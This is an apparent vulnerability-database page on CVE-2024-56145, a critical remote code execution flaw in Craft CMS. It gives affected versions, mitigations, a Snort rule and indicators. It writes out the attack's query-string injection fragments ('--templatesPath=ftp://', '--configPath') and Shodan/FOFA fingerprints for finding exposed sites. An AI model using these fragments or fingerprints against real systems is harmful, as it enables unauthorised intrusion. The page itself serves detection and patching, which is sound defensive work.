cbcvebase.
CVE-2024-56145
published 2024-12-18

CVE-2024-56145: Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Users of affected versions are affected by this…

PriorityP198critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2025-06-23
Exploited in the wild
EPSS
97.45%
99.9th percentile
Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond. Users of affected versions are affected by this vulnerability if their php.ini configuration has `register_argc_argv` enabled. For these users an unspecified remote code execution vector is present. Users are advised to update to version 3.9.14, 4.13.2, or 5.5.2. Users unable to upgrade should disable `register_argc_argv` to mitigate the issue.

Affected

9 ranges
VendorProductVersion rangeFixed in
craftcmscms
craftcmscms
craftcmscms
craftcmscms>= 3.0.0 < 3.9.143.9.14
craftcmscms>= 4.0.0-RC1 < 4.13.24.13.2
craftcmscms>= 5.0.0-RC1 < 5.5.25.5.2
craftcmscraft_cms>= 3.0.0 < 3.9.143.9.14
craftcmscraft_cms>= 4.0.0 < 4.13.24.13.2
craftcmscraft_cms>= 5.0.0 < 5.5.25.5.2

Detection & IOCsextracted from sources · hover to see the quote

url?--configPath=/nuclei_test/{{nonce}}
command?--templatesPath=ftp://
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Craft CMS Template Path Injection RCE (CVE-2024-56145)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"|3f 2d 2d|templatesPath|3d|ftp|3a 2f 2f|"; fast_pattern; reference:cve,2024-56145; reference:url,www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms; classtype:attempted-admin; sid:2058436; rev:1; metadata:affected_product CraftCMS, attack_target Web_Server, tls_state TLSDecrypt, created_at 2024_12_20, cve CVE_2024_56145, deployment Perimeter, deployment Internal, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2024_12_20; target:dest_ip;)
  • Look for HTTP GET requests containing `--templatesPath` or `--configPath` query parameters in the URI, which are the primary exploitation vectors for this vulnerability.
  • Nuclei PoC probe returns HTTP 503 with body containing `mkdir()`, `Permission denied`, or `No such file or directory` — use these response strings to identify exploitation attempts.
  • Shodan/FOFA fingerprinting: Craft CMS instances can be identified via `http.html:"craftcms"`, `http.favicon.hash:"-47932290"`, or `icon_hash=-47932290` — use these to scope exposure.
  • The Metasploit module exploits the vulnerability by abusing the `--templatesPath` argument to load arbitrary templates via FTP, leading to RCE — monitor for outbound FTP connections from web server processes.
  • EPSS score of 0.94049 (99.9th percentile) and confirmed KEV listing indicate active in-the-wild exploitation — prioritize detection and patching accordingly.
  • ·Exploitation requires `register_argc_argv` to be enabled in php.ini. Instances with this setting disabled are NOT vulnerable — scope detection rules accordingly.
  • ·The Snort/ET rule targets TLS-decrypted traffic (deployment tags: SSLDecrypt, TLSDecrypt) — the rule will not fire on encrypted HTTPS traffic without TLS inspection in place.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.09.3CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck9.3CRITICAL
cisa9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.